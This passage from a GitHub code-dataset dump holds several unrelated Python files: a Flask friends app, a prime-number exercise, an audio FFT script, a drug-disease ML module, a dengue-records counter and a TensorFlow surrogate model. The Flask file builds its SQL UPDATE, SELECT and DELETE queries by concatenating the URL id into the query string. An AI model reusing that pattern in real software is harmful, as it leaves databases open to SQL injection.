:first_name, last_name = :last_name, updated_at = NOW() WHERE id =\" + id\n        data = {\n            'first_name' : request.form['fname'],\n            'last_name' : request.form['lname']\n        }\n        mysql.query_db(query, data)\n    else:\n        friend_info = mysql.query_db(\"SELECT first_name, last_name, id FROM users WHERE id = \" + id)\n        flash(\"Please enter a valid name (no numbers or symbols)\")\n    return redirect('/')\n\n@app.route('/friends/<id>/delete', methods = ['POST'])\ndef destroy(id):\n    mysql.query_db(\"DELETE FROM users WHERE id =\" + id)\n    return redirect('/')\n\ndef validate_name(name):\n    if name_regex.match(name):\n        return True\n    else:\n        return False\n\napp.run(debug=True)\n","repo_name":"leosooter/LeoSooter-1","sub_path":"Week4/FullFriends/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"16184695234","text":"def is_prime(n, primes):\n    for i in primes:\n        if n % i == 0:\n            return False\n    \n    return True\n\ndef is_even(n):\n    return n % 2 == 0\n\ndef next_prime(f, primes):\n    print(f\"next prime {f}\\n\")\n    if is_even(f):\n        next = f + 1\n    else:\n        next = f + 2\n    \n    while True:\n        if is_prime(next, primes):\n            return next\n        next += 2\n\ndef prime(number):\n    if number == 0:\n        raise ValueError(\"there is no zeroth prime\")\n\n    primes = [2]\n    curr = 2\n    while len(primes) != number:\n        next = next_prime(curr, primes)\n        primes.append(next)\n        print(f\"found {len(primes)} primes\")\n        curr = next\n    \n    return primes.pop()\n","repo_name":"jordanabderrachid/exercism-python","sub_path":"nth-prime/nth_prime.py","file_name":"nth_prime.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33575147114","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.fftpack\r\nimport wave\r\n\r\nimport util\r\nimport filter\r\nimport note\r\nimport harmonics as harm\r\n\r\nnotetable = note.create_note_table()\r\n\r\n#wavfile = wave.open(\"./testfiles/Grand Piano - Fazioli - minor chords - Am highest.wav\")\r\n#wavfile = wave.open(\"./testfiles/Grand Piano - Fazioli - minor chords - Gm highest.wav\")\r\n#wavfile = wave.open(\"./testfiles/440Hz_44100Hz_16bit_05sec.wav\")\r\nwavfile = wave.open(\"./testfiles/low.wav\")\r\n\r\nfs = wavfile.getframerate()\r\nnchannels = wavfile.getnchannels()\r\n\r\nprint(\"Sampling freq={0}, noOfChannels={1}\".format(fs, nchannels))\r\n\r\n# Plot wav file\r\nsignal = wavfile.readframes(-1)\r\nsignal = np.frombuffer(signal, dtype=np.int16)\r\n\r\nif nchannels > 1:\r\n    signal = util.create_mono_stream_float(signal)\r\n\r\n# Get time from indices\r\n#fs = wavfile.getframerate()\r\n#Time=np.linspace(0, len(mono)/fs, len(mono))\r\n# Plot\r\n#plt.figure(1)\r\n#plt.title('Signal Wave...')\r\n#plt.plot(Time, mono)\r\n# plt.show()\r\n\r\n# Re-sample signal at 11025 Hz (Maxing out at 5512.5 Hz)\r\nsignal = signal[::4]\r\nfs = 11025\r\nsignal = filter.butter_lowpass_filter(signal, 5000, fs, order=5)\r\n\r\n# FFT test signal\r\nN = fs #fs//2\r\nT = 1.0 / fs\r\n#x = np.linspace(0.0, N*T, N)\r\n#print(x)\r\n#y = np.sin(50.0 * 2.0*np.pi*x) + 0.5*np.sin(5000.0 * 2.0*np.pi*x)\r\n# ffts_rounds = len(mono)//N\r\n#for i in range(0, ffts_rounds):\r\n#    y = channels[0][i*N:i*N+N]\r\n    # Number of samplepoints\r\n    # sample spacing\r\nyf = scipy.fftpack.fft(signal[:N])\r\nxf = np.linspace(0.0, 1.0/(2.0*T), N//2)\r\nfig, ax = plt.subplots()\r\nax.plot(xf, 2.0/N * np.abs(yf[0:N//2]))\r\nplt.show()\r\n\r\n# Use the first half of the data and convert to magnitude\r\nX = np.abs(yf[0:len(yf)//2])\r\n#print(type(X))\r\n\r\n# Normalize X\r\nX = X/sum(X)\r\n\r\n# Save the 20 last and reverse\r\nsorted1 = X.argsort()[-100:][::-1]\r\n\r\nharm.init()\r\nharmonics = harm.find_harmonics(sorted1, 3)\r\nprint(harmonics)\r\n\r\n#area = sum(X[sorted1])\r\n#print(\"Area of the 100 first : {}\".format(area))\r\n\r\n#for i in range(0, len(sorted1)):\r\n#    print(\"Frequency: {0} Area: {1}\".format(sorted1[i],
X[sorted1[i]]))\r\n\r\n#print(sorted1*(fs/N))\r\n","repo_name":"matthall3531/chordmasta","sub_path":"research/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8024981044","text":"from enum import Enum\nfrom types import SimpleNamespace, FunctionType\nfrom typing import Dict, Tuple, List\n\nfrom pandas import concat, DataFrame\n\nfrom data_sources.drug_central import substances_for\nfrom data_sources.drug_connectivity_map import dcm\nfrom data_sources.census import CancerCensus\nfrom utilities_namespace import show_table\nfrom helpers.cache import cache_decorator\nimport metrics\n\n\nclass Mode(Enum):\n regression = 1\n classification = 2\n\n\ncensus = CancerCensus().census\n\n\ncensus_genes = [str(e) for e in census.entrez_geneid]\nencoded_census_genes = [e.encode() for e in census_genes]\n\n\nclass AssociationsPreparation:\n\n def __init__(self, disease_code_to_disease_terms: Dict[str, List[str]], get_disease_expression: FunctionType):\n self.disease_code_to_disease_terms = disease_code_to_disease_terms\n controls_ids = dcm.all_controls(consensus=True).sig_id\n self.all_controls = dcm.from_ids(controls_ids, limit_to_one=True).reindex(encoded_census_genes)\n self.get_disease_expression = get_disease_expression\n\n @cache_decorator\n def get_differential(self, cancer_type, metric, limit_to_census, only_paired):\n\n expression_data = self.get_disease_expression(cancer_type, index='entrez_gene_id')\n differential = expression_data.differential(\n metric=metric,\n limit_to=census_genes if limit_to_census else None,\n only_paired=only_paired\n )\n return differential\n\n def find_substances(self, disease_name: str, contra: bool=False):\n search_terms = self.disease_code_to_disease_terms[disease_name]\n return [\n substance\n for term in search_terms\n for substance in substances_for(term, contra)\n ]\n\n def get_data_for(\n self,\n disease_name, limit_to_census=True, show_tables=False, ranks=False,\n mode=Mode.regression, cell_line_controls=True, disease_controls=True,\n fold_changes=True, only_paired=True\n ) -> Tuple[DataFrame, List]:\n\n assert not (fold_changes and ranks)\n assert mode in {mode.regression, mode.classification}\n\n metric = metrics.fold_change if fold_changes else metrics.signal_to_noise\n\n differential = self.get_differential(disease_name, metric, limit_to_census, only_paired)\n\n if differential is None:\n print(f'Not enough samples for {disease_name}, skipping')\n return None, None\n\n indicated_substances = self.find_substances(disease_name)\n contraindicated_substances = self.find_substances(disease_name, contra=True)\n\n indications = dcm.from_perturbations(indicated_substances, limit_to_one=True).reindex(encoded_census_genes)\n contraindications = dcm.from_perturbations(contraindicated_substances, limit_to_one=True).reindex(encoded_census_genes)\n\n controls = self.all_controls\n\n def fold_change(perturbation):\n control = dcm.get_control(perturbation.name, limit_to_genes=encoded_census_genes)\n assert (control.index == perturbation.index).all()\n return perturbation.divide(control)\n\n if fold_changes:\n indications = indications.apply(fold_change, axis='rows')\n contraindications = contraindications.apply(fold_change, axis='rows')\n controls = controls.apply(fold_change, axis='rows')\n\n common_genes = set(encoded_census_genes)\n common_genes -= set(indications[indications.isnull().any(axis=1)].index)\n common_genes -= 
set(contraindications[contraindications.isnull().any(axis=1)].index)\n common_genes -= set(differential[differential.isnull()].index)\n\n indications = indications.loc[common_genes]\n contraindications = contraindications.loc[common_genes]\n differential = differential.loc[common_genes]\n controls = controls.loc[common_genes]\n\n if ranks:\n indications = indications.rank(axis='rows')\n contraindications = contraindications.rank(axis='rows')\n differential = differential.rank()\n\n # drug inducing expression same as the disease (so basically causing a disease) is no cure for the disease\n disease_controls = DataFrame(differential, columns=[disease_name]) if disease_controls else DataFrame()\n\n differential.index = differential.index.map(lambda gene: b'disease_' + gene)\n\n input_data = []\n\n if not cell_line_controls:\n controls = controls.drop(controls.columns)\n\n categories = [indications, contraindications, controls, disease_controls]\n\n if show_tables:\n for category in categories:\n show_table(category, n_rows=3)\n\n for category in categories:\n signatures = category.columns\n\n if len(signatures):\n dummy = concat([differential] * len(signatures), axis=1)\n dummy.columns = signatures\n input_for_category = concat([category, dummy])\n input_data.append(input_for_category)\n\n if not input_data:\n return None, None\n\n x = concat(input_data, axis=1)\n\n labels_by_mode = {\n Mode.classification: SimpleNamespace(\n indication='indication',\n contraindication='contraindication',\n control='control'\n ),\n Mode.regression: SimpleNamespace(\n indication=1,\n contraindication=-1,\n control=0\n )\n }\n\n labels = labels_by_mode[mode]\n\n y = (\n [labels.indication] * len(indications.columns) +\n [labels.contraindication] * len(contraindications.columns) +\n [labels.control] * len(controls.columns) +\n [labels.control] * len(disease_controls.columns)\n )\n\n return x, y\n","repo_name":"krassowski/drug-disease-profile-matching","sub_path":"signature_scoring/machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":5859,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"73683938986","text":"# Reto 5\n# Eventos de dengue ocurridos en el año 2015\n\n\ntry:\n archivo = open(\"archivo/eventos_2015.txt\")\n contador = 0\n lista_eventos = []\n for linea in archivo:\n if contador > 0:\n linea = linea.replace(\"\\n\", \"\")\n linea_datos = linea.split(\";\")\n linea_datos[2] = int(linea_datos[2])\n lista_eventos.append(linea_datos)\n contador += 1\n\nexcept FileNotFoundError:\n print(\"Archivo no encontrado\")\nelse:\n print(\"Archivo encontrado\")\n\ncantidadHombreHospitalizados = 0\nmujeresBarrioLaCumbre = 0\nregistroMenores = 0\nmesJulio = 0\n\nfor datos in lista_eventos:\n if datos[3] == 'M' and datos[6] == 'Si':\n cantidadHombreHospitalizados += 1\n if datos[3] == 'F' and datos[4] == 'LA CUMBRE':\n mujeresBarrioLaCumbre += 1\n if datos[2] <= 18:\n registroMenores += 1\n sub_linea_fecha = datos[1].split(\"-\")\n anio = sub_linea_fecha[0]\n mes = sub_linea_fecha[1]\n dia = sub_linea_fecha[2]\n if (mes == '07'):\n mesJulio += 1\n\n\ndef porEdadMenorMujeres(registro):\n return [registro[3], registro[2]]\n\n\nprint()\nprint(\"Registro de Mujeres de Menor Edad\")\nprint(\"FECHA ------- BARRIO-------EDAD\")\nlista_eventos.sort(key=porEdadMenorMujeres, reverse=False)\n\nfor i in range(0, 5, 1):\n print(lista_eventos[i][0],lista_eventos[i][1], \" - \", lista_eventos[i][4], \" - \", 
lista_eventos[i][2])\n\n\ndef porEdadMayor(registro):\n    return [registro[2]]\n\n\nlista_eventos.sort(key=porEdadMayor, reverse=True)\nprint()\nprint(\"20 Registros con mayor edad\")\nprint(\"FECHA ------- BARRIO-------EDAD\")\nfor i in range(0, 20, 1):\n    print(lista_eventos[i][1], \" - \", lista_eventos[i][4], \" - \", lista_eventos[i][2])\n\nprint()\nprint(\"Cantidad de hombres hospitalizados: \", cantidadHombreHospitalizados)\nprint(\"Cantidad de Mujeres que viven en el Barrio la cumbre: \", mujeresBarrioLaCumbre)\nprint(\"Registros de igual o menor a 18 años de edad: \", registroMenores)\nprint(\"Registros en el mes de Julio: \", mesJulio)\n","repo_name":"lvicenteaa/RetosMisionTic","sub_path":"reto5.py","file_name":"reto5.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70413955309","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow.keras.layers\nfrom tensorflow.keras.layers import Dense, Input, Dropout, LeakyReLU, BatchNormalization\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras import backend as K\n\nfrom tensorflow.keras.losses import mse\nfrom tensorflow.keras.models import Sequential\nimport time\nimport resource\nimport gc\n\nfrom sklearn.utils import shuffle\n\nfrom tensorflow.keras.backend import clear_session\nfrom tensorflow.keras import layers\nfrom tensorflow import compat\nfrom tensorflow.python.keras import backend as K\nimport tensorflow as tf\n\n#settings for limiting cores (if required)\n# config = compat.v1.ConfigProto(intra_op_parallelism_threads=4,\n#                        inter_op_parallelism_threads=4,\n#                        allow_soft_placement=True)\n#\n# session = compat.v1.Session(config=config)\n# K.set_session(session)\n\n#default losses\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\nmse = tf.keras.losses.MeanSquaredError()\naccuracy = tf.keras.metrics.BinaryAccuracy()\n#sampling layer for the variational model\nclass Sampling(layers.Layer):\n    \"\"\"Uses (z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\n\n    def call(self, inputs):\n        z_mean, z_log_var = inputs\n        batch = tf.shape(z_mean)[0]\n        dim = tf.shape(z_mean)[1]\n        epsilon = tf.keras.backend.random_normal(shape=(batch, dim))\n        return z_mean + tf.exp(0.5 * z_log_var) * epsilon\n\n#custom losses\ndef full_models_loss(inputs, reconstruction, loss_weight):\n    return loss_weight * mse(inputs, reconstruction)\n\ndef discriminator_loss(real_output, fake_output, loss_weight):\n    loss_real = cross_entropy(tf.ones_like(real_output), real_output)\n    loss_fake = cross_entropy(tf.zeros_like(fake_output), fake_output)\n    return loss_weight * (loss_fake + loss_real)\n\ndef generator_loss(fake_output, loss_weight):\n    return loss_weight * cross_entropy(tf.ones_like(fake_output), fake_output)\n\n#surrogate_model class\nclass surrogate_model:\n    #initialise with input/output size\n    def __init__(self, input_size,output_size):\n        self.input_size = input_size\n        self.output_size = output_size\n\n    #create architecture\n    #nlayers = num of layers, real_layer can be 'Adversarial' or 'Variational', real_position is position of real layer,\n    #def_neurons can be used to determine the number of neurons in each layer (int or list), others are hyperparameters for layers\n    def create_architecture(self,nlayers, real_layer = False, real_position = 0, def_neurons = False, beta = 0.001, drop_rate = 0.1,\n                            loss_weights = [0.95,0.04,0.01],activation_function='elu', drop_out = None, use_bias = True,\n                            regularizer
= None, real_number =False):\n nlayers -= 1\n self.beta = beta\n self.loss_weights = loss_weights\n self.real_layer = real_layer\n self.type = real_layer\n #Input layer\n Input_img = Input(shape=(self.input_size,))\n if def_neurons == False:\n layer = Dense(self.input_size, activation=activation_function, name='layer0',kernel_regularizer=regularizer, use_bias=use_bias)(Input_img)\n else:\n try:\n layer = Dense(def_neurons[0], activation=activation_function, name='laye0',kernel_regularizer=regularizer, use_bias=use_bias)(Input_img)\n except:\n layer = Dense(def_neurons, activation=activation_function, name='layer0',kernel_regularizer=regularizer, use_bias=use_bias)(Input_img)\n i = 0\n while i < nlayers:\n i += 1\n if i == nlayers:\n layer = Dense(self.output_size, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n else:\n if drop_out != None:\n layer = Dropout(drop_out)(layer)\n else:\n None\n if (real_layer != False) and (real_position == i):\n if real_layer == 'Adversarial':\n # real adversarial layers\n front_model = Model(Input_img,layer)\n if real_number == False:\n if def_neurons == False:\n self.nlatent = self.input_size\n Input_img_mid = Input(shape=(self.input_size,))\n layer = Dense(self.input_size, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n try:\n self.nlatent = def_neurons[i-1]\n Input_img_mid = Input(shape=(def_neurons[i-1],))\n layer = Dense(def_neurons[i], activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n except:\n self.nlatent = def_neurons\n Input_img_mid = Input(shape=(def_neurons,))\n layer = Dense(def_neurons, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n try:\n self.nlatent = def_neurons[i-1]\n except:\n self.nlatent = def_neurons\n Input_img_mid = Input(shape=(self.nlatent,))\n layer = Dense(real_number, activation=activation_function, name='layer' + str(i),\n kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n\n elif real_layer == 'Variational':\n #real variational layers\n if real_number == False:\n if def_neurons == False:\n z_mean = Dense(self.input_size, name='z_mean')(layer)\n z_log_var = Dense(self.input_size, name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n else:\n try:\n z_mean = Dense(def_neurons[i], name='z_mean')(layer)\n z_log_var = Dense(def_neurons[i], name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n except:\n z_mean = Dense(def_neurons, name='z_mean')(layer)\n z_log_var = Dense(def_neurons, name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n else:\n z_mean = Dense(real_number, name='z_mean')(layer)\n z_log_var = Dense(real_number, name='z_log_var')(layer)\n z = Sampling()([z_mean, z_log_var])\n front_model = Model(Input_img, [z_mean, z_log_var, z], name='encoder')\n if real_number == False:\n if def_neurons == False:\n Input_img_mid = Input(shape=(self.input_size,))\n layer = Dense(self.input_size, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n try:\n Input_img_mid = Input(shape=(def_neurons[i-1],))\n layer = Dense(def_neurons[i], activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n except:\n Input_img_mid = Input(shape=(def_neurons,))\n layer 
= Dense(def_neurons, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n Input_img_mid = Input(shape=(real_number,))\n layer = Dense(real_number, activation=activation_function, name='layer' + str(i),\n kernel_regularizer=regularizer, use_bias=use_bias)(Input_img_mid)\n else:\n print('Not an acceptable real layer type')\n else:\n if def_neurons == False:\n layer = Dense(self.input_size, activation = activation_function, name = 'layer'+str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n else:\n try:\n layer = Dense(def_neurons[i], activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n except:\n layer = Dense(def_neurons, activation=activation_function, name='layer' + str(i),kernel_regularizer=regularizer, use_bias=use_bias)(layer)\n\n if real_layer == 'Adversarial':\n # constructs front, back, combined and critic models\n self.front_model = front_model\n back_model = Model(Input_img_mid,layer,name='decoder')\n self.back_model = back_model\n full_model = Sequential([self.front_model,self.back_model])\n self.full_model = full_model\n if def_neurons == False:\n self.latent = self.input_size\n Input_img_disc = Input(shape=(self.input_size))\n layer = Dense(self.input_size)(Input_img_disc)\n else:\n try:\n self.latent = def_neurons[real_position]\n Input_img_disc = Input(shape=(def_neurons[real_position]))\n layer = Dense(def_neurons[real_position])(Input_img_disc)\n except:\n self.latent = def_neurons\n Input_img_disc = Input(shape=(def_neurons))\n layer = Dense(def_neurons)(Input_img_disc)\n layer = BatchNormalization()(layer)\n layer = LeakyReLU()(layer)\n if def_neurons == False:\n self.latent = self.input_size\n Input_img_disc = Input(shape=(self.input_size))\n layer = Dense(self.input_size)(Input_img_disc)\n else:\n try:\n self.latent = def_neurons[real_position-1]\n Input_img_disc = Input(shape=(def_neurons[real_position-1]))\n layer = Dense(def_neurons[real_position])(Input_img_disc)\n except:\n self.latent = def_neurons\n Input_img_disc = Input(shape=(def_neurons))\n layer = Dense(def_neurons)(Input_img_disc)\n layer = BatchNormalization()(layer)\n layer = LeakyReLU()(layer)\n layer = Dropout(drop_rate)(layer)\n layer = Dense(1, activation='sigmoid')(layer)\n disc = Model(Input_img_disc,layer)\n self.disc = disc\n Adv_input = Input(shape=(self.input_size))\n adv_front = self.front_model(Adv_input)\n adv_back_output = self.back_model(adv_front)\n disc_output = self.disc(adv_front)\n self.combined = Model(Adv_input, [adv_back_output, disc_output])\n elif real_layer == 'Variational':\n #constructs front and back models\n self.front_model = front_model\n back_model = Model(Input_img_mid, layer)\n self.back_model = back_model\n else:\n self.full_model = Model(Input_img, layer)\n\n #custom training step for adversarial model\n @tf.function\n def train_step_adv(self,batch_x, batch_y=None, training = True):\n with tf.GradientTape() as ae_tape:\n encoder_output = self.front_model(batch_x, training=True)\n decoder_output = self.back_model(encoder_output, training=True)\n # Autoencoder loss\n ae_loss = full_models_loss(batch_y, decoder_output, self.loss_weights[0])\n if training == True:\n ae_grads = ae_tape.gradient(ae_loss,\n self.front_model.trainable_variables + self.back_model.trainable_variables)\n self.ae_optimizer.apply_gradients(\n zip(ae_grads, self.front_model.trainable_variables + self.back_model.trainable_variables))\n\n # 
Discriminator\n with tf.GradientTape() as dc_tape:\n real_distribution = tf.random.normal([batch_x.shape[0], self.nlatent], mean=0.0, stddev=1.0)\n encoder_output = self.front_model(batch_x, training=True)\n\n dc_real = self.disc(real_distribution, training=True)\n dc_fake = self.disc(encoder_output, training=True)\n\n # Discriminator Loss\n dc_loss = discriminator_loss(dc_real, dc_fake, self.loss_weights[2])\n\n # Discriminator Acc\n dc_acc = accuracy(tf.concat([tf.ones_like(dc_real), tf.zeros_like(dc_fake)], axis=0),\n tf.concat([dc_real, dc_fake], axis=0))\n if training == True:\n dc_grads = dc_tape.gradient(dc_loss, self.disc.trainable_variables)\n self.dc_optimizer.apply_gradients(zip(dc_grads, self.disc.trainable_variables))\n\n # Generator (Encoder)\n with tf.GradientTape() as gen_tape:\n encoder_output = self.front_model(batch_x, training=True)\n dc_fake = self.disc(encoder_output, training=True)\n\n # Generator loss\n gen_loss = generator_loss(dc_fake, self.loss_weights[1])\n if training == True:\n gen_grads = gen_tape.gradient(gen_loss, self.front_model.trainable_variables)\n self.gen_optimizer.apply_gradients(zip(gen_grads, self.front_model.trainable_variables))\n\n return ae_loss, dc_loss, dc_acc, gen_loss\n\n # custom training step for variational model\n @tf.function\n def train_step_var(self, batch_x, batch_y=None, training=True):\n # print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n with tf.GradientTape() as ae_tape:\n z_mean, z_log_var, z = self.front_model(batch_x,training=training)\n reconstruction = self.back_model(z, training=training)\n reconstruction = K.flatten(reconstruction)\n y_flatten = K.flatten(batch_y)\n reconstruction_loss = mse(y_flatten, reconstruction)\n kl_loss = -5e-4 * self.beta*K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)\n total_loss = K.mean(reconstruction_loss + kl_loss)\n if training == True:\n ae_grads = ae_tape.gradient(total_loss,\n self.front_model.trainable_variables + self.back_model.trainable_variables)\n self.ae_optimizer.apply_gradients(\n zip(ae_grads, self.front_model.trainable_variables + self.back_model.trainable_variables))\n\n return reconstruction_loss, kl_loss, total_loss\n # custom training step for normal model\n @tf.function\n def train_step_norm(self, batch_x, batch_y=None, training=True):\n\n with tf.GradientTape() as ae_tape:\n output = self.full_model(batch_x)\n reconstruction = K.flatten(output)\n y_flatten = K.flatten(batch_y)\n reconstruction_loss = mse(y_flatten, reconstruction)\n if training == True:\n ae_grads = ae_tape.gradient(reconstruction_loss,\n self.full_model.trainable_variables)\n self.ae_optimizer.apply_gradients(\n zip(ae_grads, self.full_model.trainable_variables))\n\n return reconstruction_loss\n\n #single epoch of back propogation\n def pred_back_step(self,input_guess,real_output,specify_input=None,start_loss = 0,end_loss = -1, mini_batch = False\n , constraint = False, con_wei = 0, ncon_num=5):\n #input guess is the single set of model coeffecients, real_output is the known solution for multiple experiments,\n #specify input is an optional input that specifies a part of the input, start and end loss determine the part of the\n #output where mse is applied\n #mini batch determines when the loss is updated\n mid_point = np.zeros((1,input_guess.shape[1]-ncon_num))\n mid_point[:,:]=1/2.0\n # mid_point = tf.Variable(mid_point)\n if mini_batch == False:\n with tf.GradientTape() as tape:\n #assign tape to watch the input_guess\n tape.watch(input_guess)\n #iterate across all 
experiments recieved\n for i in range(real_output.shape[0]):\n #assign the first 5 variables in the input_guess to be the experimental conditions\n if specify_input.any() ==None:\n None\n else:\n for j10 in range(ncon_num):\n input_guess[0,j10].assign(specify_input[i,j10])\n #predict the output solution from the 5 experimental conditions + 27 model coeffecients\n network_output = self.full_model(input_guess, training=False)\n #determine the MSE between the known solution for a given experiment and the one produced above\n if i == 0:\n loss = mse(real_output[i,int(start_loss):int(end_loss)],network_output[0,int(start_loss):int(end_loss)])\n else:\n loss = loss + mse(real_output[i,int(start_loss):int(end_loss)], network_output[0,int(start_loss):int(end_loss)])\n\n #determine the mean loss across all experiments\n loss = loss/real_output.shape[0]\n if constraint == True:\n if specify_input.any()==None:\n con_loss = mse(input_guess[0, :], mid_point[0, :])\n else:\n con_loss = mse(input_guess[0,ncon_num:],mid_point[0,:])\n con_loss = tf.cast(con_loss, tf.float32)\n loss = loss + con_wei*con_loss\n #determine the gradient of the loss applied to the input guess\n gradient = tape.gradient(loss,input_guess)\n #change the input guess based on this gradient\n self.ae_optimizer.apply_gradients(zip([gradient],[input_guess]))\n #if any model coeffecient deviates from range, adjust it back (ignore parameters)\n for i in range(ncon_num,input_guess.shape[1]):\n if input_guess[0, i] > 1:\n input_guess[0, i].assign(0.999)\n elif input_guess[0, i] < 0:\n input_guess[0, i].assign(0.001)\n else:\n None\n #same as above but input guess is modified after each experiment rather than after all experiments\n elif mini_batch == True:\n for i in range(real_output.shape[0]):\n with tf.GradientTape() as tape:\n tape.watch(input_guess)\n if specify_input.any() ==None:\n None\n else:\n for j10 in range(ncon_num):\n input_guess[0, j10].assign(specify_input[i, j10])\n\n network_output = self.full_model(input_guess, training=False)\n loss = mse(real_output[i, int(start_loss):int(end_loss)],\n network_output[0, int(start_loss):int(end_loss)])\n\n gradient = tape.gradient(loss, input_guess)\n self.ae_optimizer.apply_gradients(zip([gradient], [input_guess]))\n return loss\n #predict input\n def predict_input(self,real_output,epoch = 2000,specify_input=None,start_loss =0,end_loss = -1,mini_batch=False,constraint=True,\n con_wei=0, given_coeffs = False):\n #real_output is the known output\n #create optimizer\n self.ae_optimizer = tf.keras.optimizers.Adam()\n #create random input space\n try:\n if given_coeffs==False:\n initial_guess = tf.random.normal([1, self.input_size], mean=0.0, stddev=0.3)\n else:\n initial_guess = tf.convert_to_tensor(given_coeffs)\n except:\n initial_guess = tf.convert_to_tensor(given_coeffs)\n #turn input space into a trainable variables\n initial_guess = tf.Variable(initial_guess)\n loss = []\n #iterate through pred_back_step for the number of epochs, updating loss. 
Returns the input space\n for i in range(epoch):\n loss.append(self.pred_back_step(initial_guess,real_output,specify_input = specify_input,start_loss=start_loss,\n end_loss=end_loss,mini_batch=mini_batch,constraint=constraint,con_wei=con_wei).numpy())\n self.prediction_loss = loss\n return initial_guess\n\n\n #training model algorithm\n def train_model(self,epochs,training_x,training_y,test_x=None,test_y=None, optimizer = 'Nadam', callbacks = None, loss = 'mean_squared_error', \n batch_size = 200, save_full_model = False, save_location = 'model', shuffle_data=True,\n custom_training=True, early_stopping = False, LRonPlat=False):\n if self.type == 'Variational':\n if custom_training==True:\n base_lr = 0.00025\n if optimizer == 'Adam':\n self.ae_optimizer = tf.keras.optimizers.Adam(lr=base_lr)\n elif optimizer == 'Nadam':\n self.ae_optimizer = tf.keras.optimizers.Nadam(lr=base_lr)\n # tf.config.experimental_run_functions_eagerly(True)\n # Training loop\n n_epochs = epochs\n losses = np.zeros((1, 6))\n max_lr = 0.00025\n n_samples = training_x.shape[0]\n step_size = 2 * np.ceil(n_samples / batch_size)\n global_step = 0\n for epoch in range(n_epochs):\n print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)\n start = time.time()\n train_epoch_ae_loss_avg = tf.metrics.Mean()\n train_epoch_dc_loss_avg = tf.metrics.Mean()\n train_epoch_dc_acc_avg = tf.metrics.Mean()\n test_epoch_ae_loss_avg = tf.metrics.Mean()\n test_epoch_dc_loss_avg = tf.metrics.Mean()\n test_epoch_dc_acc_avg = tf.metrics.Mean()\n batch_num = int(training_x.shape[0] / batch_size)\n if shuffle_data == True:\n training_x,training_y = shuffle(training_x,training_y)\n for j1 in range(batch_num):\n # -------------------------------------------------------------------------------------------------------------\n train_batch_x = tf.convert_to_tensor(training_x[batch_size * j1:batch_size * (j1 + 1), :])\n train_batch_y = tf.convert_to_tensor(training_y[batch_size * j1:batch_size * (j1 + 1), :])\n global_step = global_step + 1\n cycle = np.floor(1 + global_step / (2 * step_size))\n x_lr = np.abs(global_step / step_size - 2 * cycle + 1)\n clr = base_lr + (max_lr - base_lr) * max(0, 1 - x_lr)\n try:\n self.ae_optimizer.lr = clr\n\n except:\n None\n train_ae_loss, train_dc_loss, train_dc_acc = self.train_step_var(train_batch_x, batch_y=train_batch_y)\n\n train_epoch_ae_loss_avg(train_ae_loss)\n train_epoch_dc_loss_avg(train_dc_loss)\n train_epoch_dc_acc_avg(train_dc_acc)\n if shuffle_data == True:\n test_x,test_y = shuffle(test_x,test_y)\n batch_num = int(test_x.shape[0] / batch_size)\n for j1 in range(batch_num):\n test_batch_x = tf.convert_to_tensor(test_x[batch_size * j1:batch_size * (j1 + 1), :])\n test_batch_y = tf.convert_to_tensor(test_y[batch_size * j1:batch_size * (j1 + 1), :])\n test_ae_loss, test_dc_loss, test_dc_acc = self.train_step_var(test_batch_x, batch_y=test_batch_y,\n training=False)\n test_epoch_ae_loss_avg(test_ae_loss)\n test_epoch_dc_loss_avg(test_dc_loss)\n test_epoch_dc_acc_avg(test_dc_acc)\n epoch_time = time.time() - start\n print('done')\n print('{:4d}: TIME: {:.2f} ETA: {:.2f} TRAIN_LOSS: {:.4f} TEST_LOSS: {:.4f}' \\\n .format(epoch, epoch_time,\n epoch_time * (n_epochs - epoch),\n train_epoch_dc_acc_avg.result(),\n test_epoch_dc_acc_avg.result()))\n if epoch == 0:\n losses[epoch, 0] = train_epoch_ae_loss_avg.result()\n losses[epoch, 1] = train_epoch_dc_loss_avg.result()\n losses[epoch, 2] = train_epoch_dc_acc_avg.result()\n losses[epoch, 3] = test_epoch_ae_loss_avg.result()\n losses[epoch, 4] = 
